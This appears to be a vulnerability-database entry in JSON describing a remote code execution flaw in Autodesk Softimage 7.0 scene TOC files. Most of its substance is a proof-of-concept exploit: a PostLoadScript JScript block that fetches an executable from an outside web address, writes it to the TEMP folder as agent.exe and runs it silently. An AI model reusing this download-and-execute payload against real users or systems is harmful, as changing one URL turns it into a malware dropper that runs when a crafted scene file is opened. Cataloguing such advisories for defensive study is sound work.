Description
No description provided by source.
{"enchantments": {"score": {"value": 0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.1}, "bulletinFamily": "exploit", "enchantments_done": [], "href": "https://www.seebug.org/vuldb/ssvid-86509", "id": "SSV:86509", "sourceHref": "https://www.seebug.org/vuldb/ssvid-86509", "description": "No description provided by source.", "type": "seebug", "cvss": {"score": 0.0, "vector": "NONE"}, "lastseen": "2017-11-19T17:18:17", "references": [], "modified": "2014-07-01T00:00:00", "reporter": "Root", "status": "cve,poc", "viewCount": 3, "published": "2014-07-01T00:00:00", "cvelist": [], "title": "Autodesk Softimage 7.0 Scene TOC File Remote Code Execution Vulnerability", "sourceData": "\n source: http://www.securityfocus.com/bid/36637/info\r\n\r\nAutodesk Softimage is prone to a remote code-execution vulnerability.\r\n\r\nSuccessful exploits will allow attackers to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. \r\n\r\n<PostLoadScript>\r\n <Language>JScript</Language>\r\n <Function></Function>\r\n <Script_Content>\r\n <![cdata[\r\nvar s=new ActiveXObject('WScript.Shell');\r\nvar o=new ActiveXObject('ADODB.Stream');\r\nvar e=s.Environment('Process');\r\nvar u='http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe';\r\nvar b=e.Item('TEMP')+'agent.exe';\r\nvar x=new ActiveXObject('Microsoft.XMLHTTP');\r\n//x=new ActiveXObject('MSXML2.ServerXMLHTTP');\r\nif(!x)\r\n exit(0);\r\nx.open('GET',u,0);\r\nx.send(null);\r\no.Type=1;\r\no.Mode=3;\r\no.Open();\r\no.Write(x.responseBody);\r\no.SaveToFile(b,2);\r\ns.Run(b,0);\r\n ]] >\r\n </Script_Content>\r\n </PostLoadScript>\r\n\n ", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647812491, "score": 1659785532}}
{}